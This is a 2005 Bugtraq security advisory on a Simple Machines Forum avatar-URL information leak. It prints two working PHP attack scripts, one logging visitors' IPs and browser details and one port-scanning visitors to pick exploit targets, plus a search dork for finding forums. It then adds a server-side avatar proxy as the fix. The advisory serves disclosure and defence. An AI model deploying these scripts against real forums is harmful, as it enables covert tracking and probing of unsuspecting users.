List: bugtraq
Subject: Simple Machine Forum 1-0-5 (possibly prior versions) user IP
From: retrogod () aliceposta ! it
Date: 2005-08-31 10:37:57
Message-ID: 20050831103757.20457.qmail () securityfocus ! com
Simple Machine Forum 1-0-5 (possibly prior versions) user IP address /
information disclosure
software:
site: http://www.simplemachines.org/
information disclosure:
a user can choose and submit an avatar URL like this:
http://[evil_site]/image.php
where image.php is a file like this:
<?php
// append one line per request for the "avatar" to a per-day log on the attacker's host
$log = "log" . date("Ymd") . ".txt";
$fp = fopen($log, 'a');
// the original relied on register_globals ($REMOTE_ADDR etc.); $_SERVER holds the same values
fputs($fp, $_SERVER['REMOTE_ADDR'] . ":" . $_SERVER['REMOTE_PORT'] . " - "
    . $_SERVER['HTTP_USER_AGENT'] . "-" . $_SERVER['HTTP_REFERER'] . "-" . $_SERVER['REQUEST_METHOD'] . "-"
    . $_SERVER['QUERY_STRING'] . "-" . $_SERVER['HTTP_ACCEPT_LANGUAGE'] . "-" . $_SERVER['REQUEST_URI'] . "\r\n");
fclose($fp);
?>
When forum users view a page that should show the avatar, their browsers request the image from [evil_site], and a new line is appended to log[date].txt on that server, like this:
08.31.05 04.09 - 192.168.1.1:8562 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-http://[target]/[path]/[page]-GET--it-/image.php
so an external user can monitor the forum activity in detail: which pages are viewed and when, user IP addresses, the OS and browser in use, the preferred language and so on
the evil script could also check the visitor's machine for open ports/services (proxy ports, trojan ports and so on) and use that to target it with exploit code or do other stuff; just an example:
<?php
error_reporting(0);
ini_set("max_execution_time", 0);
ini_set("default_socket_timeout", 1);   // give each connection attempt one second
// same per-day log as the script above
$log = "log" . date("Ymd") . ".txt";
$fp = fopen($log, 'a');
$remote = $_SERVER['REMOTE_ADDR'];      // $REMOTE_ADDR via register_globals in the original
fputs($fp, 'open ports on ' . $remote . ": ");
$portlist = "23;135;139;445;1080;3128;8080;12345";
$ports = explode(";", $portlist);
foreach ($ports as $port) {
    // connect back to the visitor's address and record the ports that accept
    $ock = fsockopen($remote, (int) $port);
    if ($ock) { fputs($fp, $port . ' '); fclose($ock); }
}
fputs($fp, "\r\n");
fclose($fp);
//then a lot of creativity ;)
?>
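The disclosure works because every visitor's browser contacts the third-party host directly. The usual fix on the forum side is to never emit the remote URL to the browser: fetch the avatar server-side, cache it, and serve it from the forum's own host, so the remote server only ever sees the forum server's address with a fixed User-Agent and no Referer. The following avatar proxy is an added example and is not SMF's own code; the id-to-URL map ($avatarUrls), the cache directory, the size cap and the avatar.php?id= endpoint are all assumptions made for the example.

```php
<?php
// Added example (not SMF's own code): server-side avatar proxy. Visitors load
// avatar.php?id=123 from the forum host; the forum, not the visitor, fetches
// the remote image, so no per-visitor IP, User-Agent, Referer or language
// reaches the third-party server.
//
// Assumptions (hypothetical): avatars are an id -> URL map in $avatarUrls,
// cached copies live under CACHE_DIR, and pages emit <img src="avatar.php?id=N">.

const CACHE_DIR    = __DIR__ . '/avatar_cache';
const MAX_BYTES    = 262144;   // 256 KiB cap on a fetched avatar
const CACHE_TTL    = 86400;    // re-fetch at most once a day
const ALLOWED_MIME = ['image/png', 'image/jpeg', 'image/gif'];

// Constructed sample data standing in for the forum's member table.
$avatarUrls = [
    123 => 'http://example.com/avatar.png',
];

/**
 * Only http/https, and no loopback/private/reserved hosts: otherwise the
 * proxy itself would let a member make the forum probe its own network.
 */
function avatar_url_is_allowed(string $url): bool
{
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])) {
        return false;
    }
    if (!in_array(strtolower($p['scheme']), ['http', 'https'], true)) {
        return false;
    }
    $ip = gethostbyname($p['host']);   // returns the host unchanged on failure
    if (!filter_var($ip, FILTER_VALIDATE_IP)) {
        return false;
    }
    return filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}

/**
 * Fetch the remote image on the server side and cache it. Returns the local
 * cache path, or null if the fetch was refused or failed.
 */
function fetch_avatar_to_cache(int $id, string $url): ?string
{
    if (!avatar_url_is_allowed($url)) {
        return null;
    }
    if (!is_dir(CACHE_DIR) && !mkdir(CACHE_DIR, 0700, true)) {
        return null;
    }
    $path = CACHE_DIR . '/' . $id . '.img';
    if (is_file($path) && filemtime($path) > time() - CACHE_TTL) {
        return $path;   // fresh copy already cached
    }

    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,                   // no redirects to other hosts
        CURLOPT_CONNECTTIMEOUT => 3,
        CURLOPT_TIMEOUT        => 5,
        CURLOPT_MAXFILESIZE    => MAX_BYTES,
        CURLOPT_USERAGENT      => 'ForumAvatarProxy/1.0',  // fixed, not the visitor's UA
        CURLOPT_REFERER        => '',                      // never leak the page URL
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
    ]);
    $body = curl_exec($ch);
    $code = (int) curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    curl_close($ch);

    if ($body === false || $code !== 200 || strlen($body) > MAX_BYTES) {
        return null;
    }
    // Trust the bytes, not the Content-Type header: sniff the real image type,
    // which also rejects an "image.php" that returns HTML or text.
    $real = (new finfo(FILEINFO_MIME_TYPE))->buffer($body);
    if (!in_array($real, ALLOWED_MIME, true)) {
        return null;
    }
    file_put_contents($path, $body, LOCK_EX);
    return $path;
}

// avatar.php?id=123 : serve the cached copy to the visitor, or 404.
$id   = (int) ($_GET['id'] ?? 0);
$path = isset($avatarUrls[$id]) ? fetch_avatar_to_cache($id, $avatarUrls[$id]) : null;
if ($path === null) {
    http_response_code(404);
    exit;
}
header('Content-Type: ' . (new finfo(FILEINFO_MIME_TYPE))->file($path));
header('Content-Length: ' . filesize($path));
header('Cache-Control: public, max-age=3600');
readfile($path);
```

Two caveats a practitioner would want: the host check resolves the name once and cURL resolves it again, so a DNS-rebinding host could pass the check and then point at an internal address (pin the resolved IP with CURLOPT_RESOLVE, or run the fetch from a host with no internal reachability), and because the remote image is fetched at most once per CACHE_TTL, the third party can no longer correlate fetches with individual forum visitors or page views. Disallowing remote avatar URLs altogether (upload-only) removes the problem entirely, at the cost of the feature.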
googledork: "Powered by SMF"
rgod
site: http://rgod.altervista.org
mail: retrogod@aliceposta.it
original advisory: http://rgod.altervista.org/smf105.html